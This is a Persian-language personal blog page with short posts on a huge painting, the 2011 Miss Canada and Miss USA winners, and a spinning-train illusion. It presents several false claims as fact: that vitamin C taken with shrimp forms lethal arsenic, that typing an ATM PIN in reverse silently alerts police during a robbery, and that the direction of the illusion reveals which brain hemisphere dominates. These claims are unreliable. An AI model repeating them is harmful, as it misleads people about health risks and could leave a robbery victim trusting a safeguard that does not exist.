بزرگترین نقاشی دنیا

تصویری خیره کننده و بزرگ که توسط Jorge Rodriguez هنرمند ونزوئلایی نقاشی شده است.

گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


نویسنده: محمد جواد ׀ تاریخ: پنج شنبه 7 اسفند 1389برچسب:بزرگترین نقاشی دنیا, ׀ موضوع: <-CategoryName-> ׀

چهره متفاوت دختر شایسته کانادا در سال 2011

چهره متفاوت دختر شایسته کانادا در سال 2011

تارا تنگ (Tara Teng) دختر شایسته استان بریتیش کلمبیا که از یکی از شهرک های آن استان به نام Fort Langley پای به رقابت ها گذاشته بود، دیروز در مونترآل به عنوان دختر شایسته کانادا انتخاب شد.

گروه اینترنتی پرشین استار | www.Persian-Star.org

به گزارش "ایرانتو"، وی دانش آموخته دانشگاه ترینیتی در رشته امور آموزشی بوده و علاقمند به موضوع حقوق بشر و مقابله با برده داری نوین و قاچاق انسان هاست. تارا، در مصاحبه های مختلف، هیچگاه خود را زیبا ندانسته و تأکید کرده، مایل است از فرصتی که برایش پیش آمده، برای پیشبرد اهداف انساندوستانه خود در جهان استفاده کند. وی پیش از انتخاب، مسئولیت یک گروه دانشگاهی با عنوان International Social Justice Club را برعهده داشته که در جهت برپایی عدالت اجتماعی، مبارزه با بیماری ایدز، فقر، قاچاق انسان و برده داری نوین فعالیت می کند. جالب اینکه برخلاف فرهنگ جاری در انتخاب دختران شایسته، از او هیچگونه تصویر نیمه برهنه در اینترنت منتشر نشده است.


نویسنده: محمد جواد ׀ تاریخ: پنج شنبه 6 اسفند 1389برچسب:چهره متفاوت دختر شایسته کانادا در سال 2011, ׀ موضوع: <-CategoryName-> ׀

انتخاب دختر شایسته آمریکا در سال 2011

انتخاب دختر شایسته آمریکا در سال 2011

در این رقابت که در لاس وگاس آمریکا برگزار شد 50 نفر شرکت کردند که از بین شرکت کننده ها دختر 17 ساله اهل "نبراسکا" توانست عنوان Miss Usa را بدست بیاورد. در این مراسم "ترسا اسکانلان" 17 ساله به عنوان دختر شایسته انتخاب شد که جوانترین دختر شایسته آمریکا از سال 1921 تا بحال است.

گروه اینترنتی پرشین استار | www.Persian-Star.org


گروه اینترنتی پرشین استار | www.Persian-Star.org


 

نویسنده: محمد جواد ׀ تاریخ: پنج شنبه 6 اسفند 1389برچسب:انتخاب دختر شایسته آمریکا در سال 2011, ׀ موضوع: <-CategoryName-> ׀

بنظر شما قطار به کدام سمت حرکت می کند؟


بنظر شما قطار به کدام سمت حرکت می کند؟

بدلیل متحرک بودن تصویر لطفا تا لود کامل کمی صبر کنید

گروه اینترنتی پرشین استار | www.Persian-Star.org

اگر قطار بسمت راست حرکت می کند بدین معنیست که نیمکره چپ مغز شما فعال و توسعه یافته است. این بخش از ذهن توانایی های زبانی شما را بعهده دارد. این نیمه از مغز گفتار و توانایی خواندن و نوشتن شما را کنترل می کند. همچنین حقایق، نام ها، تاریخ و نوشته ها را به یاد شما می آورد. سمت چپ مغز مسئول منطق و تجزیه و تحلیل است. به این معنی که تمام واقعیات را بررسی می کند. اعداد و سمبل های ریاضی توسط این بخش شناخته می شوند. اطلاعات از طریق نیمکره چپ مغز بترتیب پردازش می شوند.

اگر قطار بسمت چپ حرکت می کند بدین معنیست که نیمکره راست مغز شما فعال است. نیمکره راست متخصص پردازش اطلاعات تصویری و نمادهاست اما نه اطلاعات کلمه ای. این نیمه از مغز به ما فرصت خواب دیدن و خیالبافی را می دهد. با کمک نیمکره راست، ما می توانیم داستان های مختلف را با هم ترکیب کنیم. همچنین این نیمکره مسئول توانایی های موسیقی و هنرهای تجسمی است. نیمکره راست به طور همزمان می تواند بسیاری از اطلاعات مختلف را پردازش کند. این بخش می تواند مشکلات را بعنوان یک کل حل کند و نه با استفاده از تجزیه و تحلیل.

نمودار گویای نیمکره راست و چپ مغز انسان

گروه اینترنتی پرشین استار | www.Persian-Star.org

نویسنده: محمد جواد ׀ تاریخ: پنج شنبه 5 اسفند 1389برچسب:بنظر شما قطار به کدام سمت حرکت می کند؟, ׀ موضوع: <-CategoryName-> ׀

خطر مرگ در صورت مصرف همزمان ویتامین ث و میگو



خطر مرگ در صورت مصرف همزمان ویتامین ث و میگو

گروه اینترنتی پرشین استار | www.Persian-Star.org


یک زن تایوانی بصورت غیر مترقبه ای فوت کرد در حالیکه نشانه هایی از خونریزی از گوش بینی و دهانش مشاهده شده است. پس از کالبد شکافی علت مرگ مسومیت به دلیل وجود "آرسنیک" در شکم بیمار تشخیص داده شد. سوال این است که این آرسینیک از کجا آمده ؟!

یک متخصص پس از بررسی محتویات شکم آن زن نتیجه را چنین اعلام می کند :

ندانم کاری شخص فوت شده! و چنین توضیح می دهد که این فرد روزانه از قرص های "ویتامین ث" استفاده می کرده که بصورت عادی ضرری ندارد. همچنین شب قبل برای شام "میگو" میل نموده که اینهم هیچگونه مشکلی ندارد. ولی به طور خلاصه ترکیب داروی "ویتامین ث" و ماده غیر سمی "پتاسیم آرسینیک 5" باعث تولید "تری اکسید آرسینیک" در بدن می شود که همان آرسینیک سمی است.

پس چنانچه روزانه از قرص "ویتامین ث" استفاده می کنید به عنوان یک اقدام احتیاطی مراقب باشید بطور همزمان یا در فواصل زمانی مصرف این دارو، از خوردن "میگو" خودداری کنید.


نویسنده: محمد جواد ׀ تاریخ: پنج شنبه 2 اسفند 1389برچسب:خطر مرگ در صورت مصرف همزمان ویتامین ث و میگو, ׀ موضوع: <-CategoryName-> ׀

سرقت در هنگام دریافت پول از ATM


سرقت در هنگام دریافت پول از ATM

گروه اینترنتی پرشین استار | www.Persian-Star.org

اگر سارقان شما را وادار کردند که از کارت عابر بانک تان پول بگیرند شما می توانید پسوورد کارت تان را به صورت معکوس (یعنی از آخر به اول) وارد کنید. مثلا اگر کلمه عبور شما 1254 است شما عدد 4521 را وارد کنید. با این کار عابر بانک به شما پول می دهد ولی در عین حال دستگاه به صورت خودکار پلیس را در جریان سرقت قرار میدهد. این قابلیتی است که تمام دستگاههای خودپرداز دارند ولی اکثر مردم از آن بی خبرند.


نویسنده: محمد جواد ׀ تاریخ: پنج شنبه 1 اسفند 1389برچسب:سرقت در هنگام دریافت پول از ATM, ׀ موضوع: <-CategoryName-> ׀

درباره وبلاگ

به وبلاگ من خوش آمدید


لینک دوستان

لینکهای روزانه

جستجوی مطالب

طراح قالب

CopyRight| 2009 , mohammadjavad.LoxBlog.Com , All Rights Reserved
...